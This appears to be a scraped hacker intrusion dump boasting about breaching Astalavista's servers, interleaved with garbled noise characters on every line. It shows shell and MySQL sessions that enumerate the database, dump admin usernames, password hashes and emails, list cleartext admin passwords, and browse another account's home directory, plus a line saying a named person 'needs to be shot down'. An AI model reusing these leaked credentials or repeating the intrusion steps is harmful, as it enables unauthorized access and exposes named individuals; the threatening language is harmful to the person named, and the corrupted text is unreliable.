- X' ^$ Z* r0 d+ \+ |- h) P. i <language>en-us</language>7 t% v" |0 F H" L% J
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>' {' @' \" O) V7 Z) t: B: z
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
! m7 i! Q% \1 o <generator>Astalavista.com</generator>. E/ s+ p9 M; v c& W3 H4 R
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
% B, W) g3 ?1 [ </channel>/ i0 x9 A6 S- i( F1 f5 F- T
</rss>’;
& i2 [: o7 w' ` ]- _% B* o, h$ l7 |- S+ J
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
, Q& B1 K. r% \* q- ]$ s* c- D unlink (FULLPATH . ‘/feed/exploits.xml’);
! U/ j0 {# H) [5 [8 m }
, N5 Q7 F( g) H, Z w
- V$ f7 O* @- U2 c i8 Q5 B7 D file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);- Z2 N* O* O/ U2 V. X
[snip]& ~5 L/ R; G# |1 C
: u" ]# a3 E( X6 j' n* y1 y* b/ Msh-3.2$ cat exploits.sh
9 r. \: v% X' u% z7 R#!/bin/sh+ f) a& o% ^% ?
2 S4 @0 i" [+ U+ U- I6 N5 Y' c
###########################################################
0 t7 d3 F0 J7 t% G2 z+ x+ r6 m# #
8 T" m6 e$ R3 R3 L# L( [0 C" }# Title: milw0rm exploits adder #+ n9 P) C: R) B
# Description: Add all milw0rm exploits to the #' E/ q! `. a- K" p
# Astalavista.com database #
b; f6 a- O6 j( e& j# #
4 H5 \1 g1 Y5 r7 W( P+ |7 b# Company: Astalavista Group #
" G* ^6 \; W/ ?0 Y1 n- T9 {: Z3 G) L# Author: Paulo M. Santos #
, @4 H; g! V7 c! }# E-Mail: 链接标记paulo.santos@astalavista.ch #
9 c, H$ h; Y& K* q7 S0 q! x' L6 H# #( h! l5 K9 g/ n- a6 T" a
########################################################### R& W4 C: p; r- @4 X* U
3 P( P& F0 N) S8 a
# path: U. I( [ {7 `6 i0 _4 M
this_path=/home/com/public_html/modifications/cronjobs. V. @7 C. h' t/ F
. P) L/ T0 F- R! P
# change directory
( @# A, `5 q$ ]( `5 B0 w7 icd $this_path3 z8 R9 i n( ?. k. n7 u. B( z& d
cd tmp/1 k7 O9 d; N: B: U1 G4 Z! `0 u% ~
- S0 K7 Z) B7 p7 J2 @8 T9 ~
# delete files% @- h' {3 D l2 D- j3 R
rm -rf milw0rm.tar.* &
% e F1 I/ p1 Y; z3 {! o$ t! p/ Jrm -rf milw0rm/ &
7 e: N% D" k+ `) c. \8 ^6 W
' x+ q4 k V/ U( `& m; x# wget milw0rm paket
: q$ N- i4 i. C) N! E7 Bwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
4 `& U3 V& A; @7 M! y
+ L6 B9 v( K0 [# j( X; v" T# extract milw0rm paket' L7 J# @6 ]; i$ J( Z @8 j
tar -xvf milw0rm.tar.bz2
0 M* O* I; O/ ]) g
5 ?2 x- S2 y& ^# J( H: k3 ]+ `# change owner! N+ n6 a6 a- \' p0 c% n; a
chown -R com .
) a. j' R* M/ z! |; ?chgrp -R com .
( d$ O. z+ V9 h0 w* }
: c- b- j* R) Y# ~. F. a# execute php script4 T. _% I* ?8 l$ B
cd $this_path
! G7 ~4 R. E9 i" I& j' X- u8 vphp -q exploits.php1 |6 q0 c& M1 h5 a5 {
8 V0 n P0 c/ h" o# delete files
/ t1 R$ `8 q8 f/ D$ a! R5 H/ Hrm -rf tmp/milw0rm.tar.*
( r A: t3 p& `+ o {* S8 Q! Srm -rf tmp/milw0rm/: q+ e8 h/ q k J% m
2 t4 m) X3 k: y
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
" Y. o; e) h4 `( N6 l4 FPaulo M. Santos needs to be shot down./ o6 W& Q% K0 L5 |' Q' T
! s% K$ z$ G$ _+ C, amysql -u contrexxuser2 -p
5 s4 I" Y" ?) c3 K1 N3 MEnter password:8 T8 a7 a+ l% I1 Z0 W
Welcome to the MySQL monitor. Commands end with ; or \g.
% F2 _9 j$ J' X QYour MySQL connection id is 261694# M. c+ j; A" H; Y$ A l4 r5 I. d z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
! p9 M, j; w0 D, S1 ~5 C& S3 g. N
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* f" K4 b) {9 q! G2 p3 g
: Y- A* o p* h* D( P
mysql> show databases;
3 L% V# g; l9 V% E) O+——————–+
$ r5 M: U9 J# @* K& D F- e| Database |3 w2 W+ k- A8 z
+——————–+$ @& ~, q+ q2 G0 j
| information_schema |6 H# ], N: u. b5 P5 ]2 y7 H# S4 X% m
| com_contrexx2 |0 ^& z4 }! Z k( x1 j* s' Z. v0 E
| com_contrexx2_live |- a) O4 x7 I+ x2 N8 y' ^" K# T
| test |
, ^7 @* @" I* e/ E+——————–+
- E* i5 r7 b) E: \+ a4 rows in set (0.00 sec)
8 V' e! X+ r; z8 C9 i* ` h% K( J7 I- w, P' L) ? O
mysql> use com_contrexx2_live
6 r$ J5 z& W9 ^; C- ^/ j2 Y" HDatabase changed! i3 ^* m% r# N- I& e; J
mysql> show tables;
- r/ C+ C# F6 v& v+————————————————–+) c m& f% y+ ^; Q. \$ C- j
| Tables_in_com_contrexx2_live |
! o% U; n. @* a0 Y8 k+————————————————–+
& q6 u5 c2 l7 d p5 M) n| cc_banner_counter |2 [( _2 r. I1 s9 c2 [
| cc_search_counter |
; Y& |* n8 C& ]5 v+ {4 O| contrexx_access_group_dynamic_ids |5 r4 P8 s v7 e, e
| contrexx_access_group_static_ids |
9 x! K8 u/ T; O0 u+ D) V, A| contrexx_access_rel_user_group |/ s# C5 D, g1 k. x$ i& L
| contrexx_access_settings |
+ a/ n/ `1 p2 e) F) n2 q7 q, i| contrexx_access_user_attribute |6 \7 D5 t7 j4 j& R8 W. v, R( S! \
| contrexx_access_user_attribute_name |
: M* N) m3 t5 z& u/ K| contrexx_access_user_attribute_value |
0 c7 B9 a0 F" J+ a& [| contrexx_access_user_core_attribute |
0 f# s( J0 P/ S7 g| contrexx_access_user_groups |$ b0 i2 x: z( M# t
| contrexx_access_user_mail |
8 x! Y! E/ {) h4 D" \( L Q3 r; I- u1 i| contrexx_access_user_profile |
5 b7 ]: F9 c2 m2 D8 }/ W2 ?| contrexx_access_user_title |
, F& ~4 u3 D- T( s8 B8 C2 Y7 U* l| contrexx_access_user_validity |
% B) ~- E% W6 \; j6 I, k2 e& j. R| contrexx_access_users |1 |8 t4 d- `1 C2 o! z9 R
| contrexx_backend_areas |. w: O2 Z; i/ h7 V F
| contrexx_backups |2 }0 e3 h& }1 d8 v( o. y
| contrexx_content |3 r4 a% a( `' M$ d# g
| contrexx_content_history |* [: ?- Y" F% w) Z! z8 f
| contrexx_content_logfile | x! I, y) x0 i! u
| contrexx_content_navigation |6 P. ~, X! n& M3 m8 q5 Z
| contrexx_content_navigation_history |1 F! S$ v* d0 K. V+ Y+ @: F' z
| contrexx_ids |
- Q4 W: L; i$ `, B; k| contrexx_languages |, v1 a9 P1 v+ O% P/ v
| contrexx_lib_country |
7 |- x0 ~, n: E/ g; t| contrexx_log |
: H4 g) S) L3 _$ N6 T! G N| contrexx_module_alias_source |
; k e* H0 D2 S4 i0 Z& Q| contrexx_module_alias_target |
+ v3 P# [6 c7 P' H" p# B: v4 k! f| contrexx_module_block_blocks |
+ ^# z B7 i+ u' z* H- @8 o| contrexx_module_block_rel_lang |- B1 Y; S5 e0 B: `2 C8 k: t7 M
| contrexx_module_block_rel_pages |% A( Y4 M* Z$ h) X% [+ J
| contrexx_module_block_settings |
& k0 e8 D$ a' N; v| contrexx_module_blog_categories |* ~: o$ W+ ~0 s% q% d( r$ i% `+ e
| contrexx_module_blog_comments |
2 @2 R7 I* s U| contrexx_module_blog_message_to_category |% p/ e8 v4 |* ]9 F n
| contrexx_module_blog_messages |
- P9 A; B# E3 I( }( S+ e) \; d| contrexx_module_blog_messages_lang |; d: A/ W( V7 A+ R0 d- S$ i
| contrexx_module_blog_networks |
7 ?6 Y( |" C7 I" ~- {/ g| contrexx_module_blog_networks_lang |
4 Y/ x) [; v7 w8 T| contrexx_module_blog_settings |
+ S. ?6 v. y7 {/ |4 z( L| contrexx_module_blog_votes |
) l* r! y. [8 x| contrexx_module_calendar |6 g: U+ |' K3 l W& E2 {
| contrexx_module_calendar_access |
+ a+ B# L a+ v7 _8 M* `! C' H| contrexx_module_calendar_categories |1 o( O/ ~8 j( c4 ?
| contrexx_module_calendar_form_data |
' L( a# R4 o/ c) X, K| contrexx_module_calendar_form_fields |8 F3 s9 m' r% t0 z3 C3 d
| contrexx_module_calendar_registrations |5 x0 Z/ V( v1 \
| contrexx_module_calendar_settings |
1 K- X9 i. P C| contrexx_module_calendar_style |# _" |: W. p1 D
| contrexx_module_contact_form |
1 ?) T& X; b! S/ R; }8 e; B| contrexx_module_contact_form_data | N' M+ e% }7 ]
| contrexx_module_contact_form_field |
7 {, j4 y! Q9 Y+ j* s| contrexx_module_contact_settings |; j; g& e1 v1 m3 ], }
| contrexx_module_data_categories |
. w8 x7 u! k* ?" _7 _| contrexx_module_data_message_to_category |, ?* y( @; o5 k o' P2 S
| contrexx_module_data_messages |- _4 ?' E# K3 H: ^6 \
| contrexx_module_data_messages_lang |
9 V8 K4 j% q( i, v8 b| contrexx_module_data_placeholders |5 i! K8 } T5 x- {8 u5 S% ^# M
| contrexx_module_data_settings |
5 M! D3 y" B6 z/ h) P| contrexx_module_directory_access |7 V% @( u0 K9 Q a
| contrexx_module_directory_categories |
; |. C& d& B+ A: F" y; f0 Q7 w| contrexx_module_directory_dir |
3 \ n& t/ g7 o1 w# u% p| contrexx_module_directory_inputfields |
7 H! ?6 d1 l* ~( v; c5 ?. F| contrexx_module_directory_levels |
' N1 Z1 Z4 [! T| contrexx_module_directory_mail |
' c5 |+ o" `( w3 }| contrexx_module_directory_rel_dir_cat |" T# |+ G' Z t! Z% u
| contrexx_module_directory_rel_dir_level |( B& a* r6 I/ U% q
| contrexx_module_directory_settings |
8 J ]! x: o- u* ]| contrexx_module_directory_settings_google |) q, o- u( }4 b- N6 R
| contrexx_module_directory_vote |
c. g( d1 T$ Q% N| contrexx_module_docsys |
! F) {& g+ M' @; p/ i| contrexx_module_docsys_categories |
: S$ u& d) A6 J| contrexx_module_egov_configuration |
* V. e1 }) Z% ~7 m| contrexx_module_egov_orders |1 p0 J$ q& I. k+ w" q+ Q4 X: z6 B
| contrexx_module_egov_product_calendar |
$ T& w4 \: @! n+ H: m {| contrexx_module_egov_product_fields |
( q4 P+ g ]* j! }& E| contrexx_module_egov_products |. _9 {% X7 I1 }7 M/ d7 \% ]" n2 l0 N
| contrexx_module_egov_settings |
. l! T: e5 v0 Q9 n( B| contrexx_module_exploits |
, n: W* R; G/ x1 q+ [) || contrexx_module_exploits_categories |6 k K- x3 i! Y8 ]: ~7 `
| contrexx_module_feed_category |
7 E+ t7 p0 R8 l| contrexx_module_feed_news |7 m" t/ c+ q6 _% @- q( A& ]! H
| contrexx_module_feed_newsml_association |
0 y, p/ _/ I6 C6 ?1 ]8 y( I6 N| contrexx_module_feed_newsml_categories |+ g- S& G6 j+ k
| contrexx_module_feed_newsml_documents |
& Y" \4 u8 f7 i% W| contrexx_module_feed_newsml_providers |
. E* @5 f" z/ D6 E$ a. R| contrexx_module_forum_access |
9 h+ Q" G: B, t| contrexx_module_forum_categories |% M4 d. D; s; e! m X
| contrexx_module_forum_categories_lang |' x2 P& }7 z) E4 {
| contrexx_module_forum_notification |0 U' Y, o0 d/ I: K, E2 T/ H) H' l
| contrexx_module_forum_postings | e( q* Y" y4 M% R! l
| contrexx_module_forum_rating |0 i: m! ]+ S8 b; ]7 I1 _) }# ?( |
| contrexx_module_forum_settings |" `8 E3 h3 I' f% Y0 j
| contrexx_module_forum_statistics |( ^$ L% F6 C2 c& o5 x4 w) J
| contrexx_module_gallery_categories |; ?1 J: [3 H- \0 g+ J' O% f5 U
| contrexx_module_gallery_comments |
: J, c6 z1 Z( ?| contrexx_module_gallery_language |' I* E. k% G! J5 T: X
| contrexx_module_gallery_language_pics |6 g! K1 C. |; H4 }, [
| contrexx_module_gallery_pictures |6 h2 ?* ?0 C! y
| contrexx_module_gallery_settings |
* m4 ?) k d$ W. |3 t4 Q$ r| contrexx_module_gallery_votes |$ B; U) L; f/ R" P; d+ Z! L Q0 j
| contrexx_module_guestbook |2 F0 C r+ @# k4 M6 ^" `8 ]8 K
| contrexx_module_guestbook_settings |
2 o# S- Y: e4 w8 }/ ?| contrexx_module_livecam |+ P. y1 n$ G/ O* E3 d; u
| contrexx_module_livecam_settings |+ i! w: r: v* E7 g
| contrexx_module_market |8 M5 ~3 i" x$ B6 ]9 ~, ? M, ^8 W
| contrexx_module_market_access |
* V" @& R$ b. V9 u" b| contrexx_module_market_categories |
& b* v, D7 f+ [* N5 T2 f7 M2 Z) q| contrexx_module_market_mail |6 Y7 k8 l, \; A: N
| contrexx_module_market_paypal |* g3 R. n, j* o8 t
| contrexx_module_market_settings |5 K& h" ~" a! {( t
| contrexx_module_market_spez_fields |' w3 Q- f+ z' b
| contrexx_module_mediadir_access |6 R U9 N- a3 k& M4 f# t/ Z
| contrexx_module_mediadir_categories |
7 r# m1 \& @3 R D| contrexx_module_mediadir_comments |5 D# l& }% ^ M% t8 i
| contrexx_module_mediadir_dir |
( L7 G7 ?1 o. C# i4 V# P| contrexx_module_mediadir_inputfields |
+ Q( r& D! o$ g% F5 u| contrexx_module_mediadir_levels |/ w3 T E3 i5 S6 x9 p0 K2 _# q
| contrexx_module_mediadir_mail |
1 ~( V8 S4 F0 K2 N1 a7 M| contrexx_module_mediadir_rel_dir_cat |
2 q' E1 `. ]* v' z7 t7 p| contrexx_module_mediadir_rel_dir_level |
" C# o9 }" \- N+ h2 j2 A7 f4 N| contrexx_module_mediadir_reports |
/ o4 ?" t g o# d| contrexx_module_mediadir_settings |
' B A) ?6 u0 N: c7 N& N% {| contrexx_module_mediadir_settings_google |8 G4 `/ e7 u! N
| contrexx_module_mediadir_vote |
+ @. S/ r* ?+ _2 I| contrexx_module_memberdir_directories |* K5 u, Q+ _6 }7 M. I8 ~
| contrexx_module_memberdir_name |
, C4 j/ o/ i: [% P7 e. x5 u7 Y| contrexx_module_memberdir_settings |+ ^5 e2 n* l0 g C. o9 ?! N8 |
| contrexx_module_memberdir_values |% | F" z. ?& Z$ m% u w
| contrexx_module_nettools_allowed_groups |1 R8 ?( N! l* n, p- A* E1 }
| contrexx_module_nettools_settings |
6 P$ |2 a$ e) I+ E( || contrexx_module_news |
5 [) _- F7 i7 X+ _| contrexx_module_news_access |$ T6 {" c2 J$ v6 F) D
| contrexx_module_news_categories |. ^6 i4 S8 W: K4 L, }' e" L
| contrexx_module_news_settings |2 ~! C6 R9 E: S+ w' @4 L
| contrexx_module_news_teaser_frame |
% N* U" Q K% d4 H. r| contrexx_module_news_teaser_frame_templates |
# }- F j, Z6 a0 o( v# E. [| contrexx_module_news_ticker |
+ K+ a+ e/ G' r s| contrexx_module_newsletter |7 j u0 P2 Y4 ]+ p" n
| contrexx_module_newsletter_attachment |
" \+ h3 }; p7 O! [$ Q| contrexx_module_newsletter_category |0 f# g/ w4 D- F0 [
| contrexx_module_newsletter_confirm_mail |
2 @& ]! Z# u" Q1 N( K| contrexx_module_newsletter_rel_cat_news |
* X* b W' X; x1 n, ^. `| contrexx_module_newsletter_rel_user_cat |
+ f" D8 N( j2 G" A) D# p| contrexx_module_newsletter_settings |- Y* K( e# y1 D& M* _- K% g
| contrexx_module_newsletter_template |; t5 ~- l! f* a: S
| contrexx_module_newsletter_tmp_sending |; e- O. z+ A% ]
| contrexx_module_newsletter_user |& H3 }+ a/ r+ |* i' d6 m
| contrexx_module_newsletter_user_title |& k8 Y: J" G3 G+ N
| contrexx_module_onlinetools_defaultports |
! ^5 i0 i- i9 D( p| contrexx_module_onlinetools_defaultports_back |; C* ^2 e$ _1 J4 D2 t+ Q" s) u
| contrexx_module_onlinetools_geolitecity_blocks |7 U; G8 H2 Y" L, t/ z) g* p
| contrexx_module_onlinetools_geolitecity_country |
, K z2 [9 n; Z8 l| contrexx_module_onlinetools_geolitecity_location |
4 p/ v; p/ N4 t: |0 T7 d4 O% g| contrexx_module_podcast_category |7 \1 j! b8 k C4 G/ ?4 q" g) g
| contrexx_module_podcast_medium |
" L; W! D& l: n: y, L8 i) E$ m| contrexx_module_podcast_rel_category_lang |
8 o7 `& ?4 I+ v" D, L| contrexx_module_podcast_rel_medium_category |% D& }1 ]; V/ l% m! F' F/ d0 C
| contrexx_module_podcast_settings |
# L3 ]# }' e, E| contrexx_module_podcast_template |
, F+ S+ b& f- Y' a| contrexx_module_proxydb |
' S2 P! q; V- @9 y5 J @| contrexx_module_recommend |
/ D2 J Y$ K" f4 \6 z, \) P| contrexx_module_repository |
% m, z7 A6 ^; [( C" || contrexx_module_securitynews_cats |+ c: I) i Z& H+ }: L
| contrexx_module_securitynews_feeds |6 v4 c, e, e; @( O5 w' H7 c
| contrexx_module_securitynews_news |
' ~, s' c8 f& Q! X) O$ ?| contrexx_module_shop_categories |
$ L( H! i9 B! ?- k3 X# h; m8 g| contrexx_module_shop_config |% |6 z, p- W2 P, e- W9 M( M; P3 M6 \
| contrexx_module_shop_countries |1 j+ ^( u9 Z) A% c" K4 w1 k- d( U$ _" G
| contrexx_module_shop_currencies |( e* I; p* ^* s* O5 [
| contrexx_module_shop_customers |- q* `$ r- v$ h0 p- ^! l4 \
| contrexx_module_shop_importimg |
; ]5 ^* u& U4 D j! ?) [| contrexx_module_shop_lsv |
0 m3 A) n( @3 J5 ^$ j4 f| contrexx_module_shop_mail |
' c2 b; a- C6 N9 w| contrexx_module_shop_mail_content |/ [6 b& ~2 \" `# X4 T" P |
| contrexx_module_shop_manufacturer |/ g N" J- J* S2 d ]! C2 N
| contrexx_module_shop_order_items |; B/ i9 u; L7 ^6 F' i$ _
| contrexx_module_shop_order_items_attributes |7 l. ~/ r. I' m! c
| contrexx_module_shop_orders |
( A/ [8 X; x* o6 J. x, B6 s| contrexx_module_shop_payment |
8 D S& ?; a2 b S( \& D& T| contrexx_module_shop_payment_processors |, d. T" Y, m4 I- p6 B
| contrexx_module_shop_pricelists |
8 i+ S4 i6 o: a: e| contrexx_module_shop_products |
h% h/ y& \" ~; _0 A; O1 h9 W4 w| contrexx_module_shop_products_attributes |3 e( D7 x" E9 R; Z3 \1 y* u2 x4 x
| contrexx_module_shop_products_attributes_name |, d/ ]+ r3 W, F3 @1 p* L- D; d
| contrexx_module_shop_products_attributes_value |
! D# o5 @' O, @| contrexx_module_shop_products_downloads |
, u, t* e+ O% m6 e/ L| contrexx_module_shop_rel_countries |% F: a% g& g/ u9 D( a0 n, i4 i
| contrexx_module_shop_rel_payment |9 }* b C, N! W$ |
| contrexx_module_shop_rel_shipment |
( ~) P5 |* R; w9 L6 Z9 W1 ?| contrexx_module_shop_shipment_cost |
8 i/ y1 D% j/ N8 m$ L3 p$ _4 J| contrexx_module_shop_shipper |: B& f r$ F& z1 s; H9 ?4 B
| contrexx_module_shop_vat |9 V% G8 d5 R! ]* O+ K0 ]1 B' \
| contrexx_module_shop_zones |% p; D- t$ {& O5 g
| contrexx_module_u2u_address_list |
5 `2 j6 M4 A; H- a$ n| contrexx_module_u2u_message_log |1 U n* o1 x0 ]! G! J
| contrexx_module_u2u_sent_messages |
% B! W1 \2 n8 I9 z" S [4 m| contrexx_module_u2u_settings |
5 k2 A4 O9 \" q7 T. l| contrexx_module_u2u_user_log |# c7 L+ W+ b# [ v
| contrexx_modules |
$ o; P1 e. h& X3 b8 y) _3 o9 X+ n: v| contrexx_sessions |6 k+ J$ d( y/ t
| contrexx_settings |* t1 M9 S5 I1 D9 N+ I6 A$ H* d) o
| contrexx_settings_smtp |
! F) ?0 I7 d: _- d5 W1 {# g| contrexx_skins |' [; L+ e) H8 E i7 t
| contrexx_stats_browser |; q# d6 i! a, m$ o" e5 ^
| contrexx_stats_colourdepth |- e. P- g, p; p0 ]$ i: i- [
| contrexx_stats_config |) [% L: O$ s' q3 B. j" x G
| contrexx_stats_country |
4 D. X, G' V1 r$ z4 g3 g9 C| contrexx_stats_hostname |$ ? B) b4 c0 ?0 j# L" R7 }0 O
| contrexx_stats_javascript |- M0 e+ Z- A4 F, J" B
| contrexx_stats_operatingsystem |& V) B+ p/ H0 c$ `( B: P
| contrexx_stats_referer |' S3 B: @; ?4 l. K0 ?. [
| contrexx_stats_requests |, A$ u, l! E4 e8 C, B+ [
| contrexx_stats_requests_summary |
: z+ G) k! ?- |. C| contrexx_stats_screenresolution |/ q7 t: S$ M: p3 ]) k
| contrexx_stats_search |
" b; x2 d0 \+ m| contrexx_stats_spiders |
! L( u7 C& Y9 @+ c| contrexx_stats_spiders_summary |
( a' Z( V( P$ n( O8 i& ?| contrexx_stats_visitors |
5 p; [0 B- n9 B1 m4 w# \| contrexx_stats_visitors_summary |
, _, O, J3 S! z7 a| contrexx_voting_additionaldata |
' H% y( H9 Y; w9 H$ q( t| contrexx_voting_email |
( d; C$ k i8 r| contrexx_voting_rel_email_system |9 m$ h3 j1 G. z3 T
| contrexx_voting_results |( I! C8 S6 ~) Z
| contrexx_voting_system |
9 X- a' \; e: D3 a) i| foo | q/ K# D6 `8 z w' R& p
+————————————————–+
5 R' e& ?: L, b7 F4 A, c) m: k227 rows in set (0.01 sec)" @* P9 ~! i5 r; n' \8 }* u: _) u
. ~% i- q/ ?; N6 T
mysql> select count(*) as skids from contrexx_access_users;
. w# a$ A- C5 Z9 p8 W8 _$ k+——-+
1 Z. ^8 d1 z( y" H| skids |% \: K" F; P: M1 Z
+——-+
- |! s |% l9 t| 53699 |
/ \3 M$ `; M/ n' r$ A8 h& l2 i5 H W+——-+( d+ @; q; S1 L/ Z6 ]
1 row in set (0.00 sec)
6 M( O; u: T' o
2 o1 m! ?: @7 h4 X% [9 i. K$ Qmysql> describe contrexx_access_users;
9 W! i/ {9 ~+ N0 E+——————+——————————————+——+—–+————–+—————-+, \1 \3 a2 y" R2 N
| Field | Type | Null | Key | Default | Extra |
$ t* N8 Y" E( A1 k+ g' e+——————+——————————————+——+—–+————–+—————-+
) E( P' Z, K8 X& w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 c" D3 O/ J7 s- F# }
| is_admin | tinyint(1) unsigned | NO | | 0 | |
* @$ F$ ^+ b' I% S- v: G+ W: V| username | varchar(40) | YES | MUL | NULL | |
% R$ `# _* J9 p* V% ] Y| password | varchar(32) | YES | | NULL | |2 C3 Q8 y0 B3 z6 R y
| regdate | int(14) unsigned | NO | | 0 | |6 b9 f5 s1 D3 b
| expiration | int(14) unsigned | NO | | 0 | |
- a/ `2 q- H4 I) d8 q! X: r9 [| validity | int(10) unsigned | NO | | 0 | |: R, ?9 g) {5 Y4 S) m
| last_auth | int(14) unsigned | NO | | 0 | |
, e3 G1 L6 D1 p& S| last_activity | int(14) unsigned | NO | | 0 | |
6 i5 h6 H, F% H j/ w$ m| email | varchar(255) | YES | | NULL | |5 M/ [4 B8 O, [
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |8 L2 q/ c; l& i8 O
| frontend_lang_id | int(2) unsigned | NO | | 0 | |3 v2 [% W% I& U0 _0 Z6 T) D
| backend_lang_id | int(2) unsigned | NO | | 0 | |
3 \! @. ^; Y" C' ^* j4 ?0 r+ \; [| active | tinyint(1) | NO | | 0 | |* i, t" _( T- C' r
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |8 F" @% h5 O$ G: f3 n- H& N- @* N
| restore_key | varchar(32) | NO | | | |7 Q' H4 z3 k6 ^5 D* T4 S9 E
| restore_key_time | int(14) unsigned | NO | | 0 | |
% b9 {% `; [( g1 p/ T0 \| u2u_active | enum(’0′,’1′) | NO | | 1 | |
. a: [7 A( w6 x+——————+——————————————+——+—–+————–+—————-++ Y2 _) ~3 s( V4 K
18 rows in set (0.00 sec)" S& B! \$ a+ R8 O, ]& z- `
3 l( Z% V9 X& y5 @: |" V; ]mysql> select username,password,email from contrexx_access_users where is_admin = 1;
. h/ W2 i* q, ]! e7 U% l: p+————+———————————-+—————————–+. y6 P' e" k- H. K6 {, E7 w
| username | password | email |
. y$ v6 u4 p8 Y+————+———————————-+—————————–+
; D+ c, ?1 \. R| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |/ w. `8 J0 O/ O- y: X) F% W
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |* M- A' ~$ B5 N. S, L
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |/ a/ t4 r! N5 v) B6 L( Z" L- F5 l
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |5 N0 X5 K% I; E
+————+———————————-+—————————–+
" L( g1 E! \ J/ e' ~4 rows in set (0.04 sec)
9 C3 I& P$ k. Q& W2 V8 k8 g( O9 o' a" {* I7 I7 i
mysql> exit;
4 p" i4 z1 a( o" V0 t( Z. H p s1 MBye! ^7 \, o% V' V9 `" M
6 m! t% Q) Z- j4 T. z
[~] There you go, your “team of security and IT professionals” is a joke.7 _% e; @$ I! w' j9 I0 N
( I/ t# e/ ^- Y9 Y+——————————+
! Q$ U& w @9 t, u Asystem:f82BN3+_*
2 ~1 G7 ^/ Q/ L8 G @0 yBe1er0ph0r:belerophor4astacom
. a* c7 D9 S- [2 y. E$ R' Fprozac:asta4cms!
E6 i% x- k4 y0 }% v( \commander:mpbdaagf6m
8 Z1 ]* ~. K- {* x" s; P5 `- F7 dsykadul:ak29eral1 R4 s e/ ~# q) a9 l
+——————————+ j; o% l' {$ U0 R9 U( O
. K) I. w1 j" D4 I! Y1 k
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)/ ~- _ p& V K3 n' A
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.' |/ x4 Y$ T& m8 J% K
7 X3 E. G ]. O" Z+ f7 S& ?[~] Lets move to astalavista.net now,
$ }9 O7 X; Q% x" Q5 ^5 m- c2 y. O0 P
From <链接标记[url]https://www.astalavista.net/[/url]>:
; N. p* y& ~8 i/ n3 }>> Everyone knows that the best defense is a good offense.$ e2 m+ y, [) }6 D% l
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
0 x! s$ V" F1 F& j; l>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
+ F) M) R5 G$ U6 B2 W- g4 R>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”% f4 L& \" O' f1 C: D' P/ g
2 [% l" j, H! Y" V
>> Go ahead, try and hack our server . in a completely legal way!
" `. v- m* j$ w) p( ]>> Learn by doing: We offer our members tricky tasks and challenges on an' H8 g+ P! f, w) W$ M2 E
>> ongoing basis so you can test your knowledge and abilities. You can also) ?* ]8 _8 W# {) B' [
>> demonstrate what you.ve mastered by taking part in regular hacker contests
& s T* b7 g5 v: T e. e* Z3 o>> and war games+ E, W! D6 J% k$ N) R! R
! n$ z8 t9 K K. K3 J[~] Lets take a look there, after all… they are hack-proof, aren’t they?!/ r8 l( I4 Z/ }$ c: V
: L9 @. L( A0 \. j- m
[-] Tricky task: Find home dir of astalavista.net
: M) C |/ w: s, L X3 C# P+ h) u1 P) U8 C* @" [
sh-3.2$ ls -la ~astanet& [" w. u. U7 [ q- }4 ]
total 48
1 H0 K) C4 K: \* f h/ K/ Gdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .0 v) ]2 U* a. _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% e2 X' k9 F+ i4 u. \% u
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* h7 c" g; K/ E-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
" _3 N3 {2 M( ~-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
6 W) ^- n x6 d! l/ a/ d, W; E-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile D) h) U+ F _
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc; \5 j& R. W4 u- J: i" x
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains: ~* H1 B9 q# k1 x4 y1 t: u9 _
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap- K' c5 Q3 h9 n8 q1 n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
. n( V3 J" N' s$ H4 t2 blrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" Y2 ? f5 O' Q9 n" `# F6 [. L-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
" w/ u% u# h; M2 P+ ~' h7 w3 [( |9 M) [% B' Q$ G
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/( \' ]1 I1 I6 `, E( G5 s
sh-3.2$ ls -la9 L2 a# ?! h- H/ @' U. f" L
total 200
% d2 h2 T* x% V. i$ Bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
& k( l1 }. ^% m/ N+ a: E; F$ l, h' x! t; edrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..; D4 L$ Z# `8 d4 U. [
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
! ?2 g0 W- A6 h: y5 vdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
+ j1 X6 h# [8 x8 P* k" o. T; Sdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
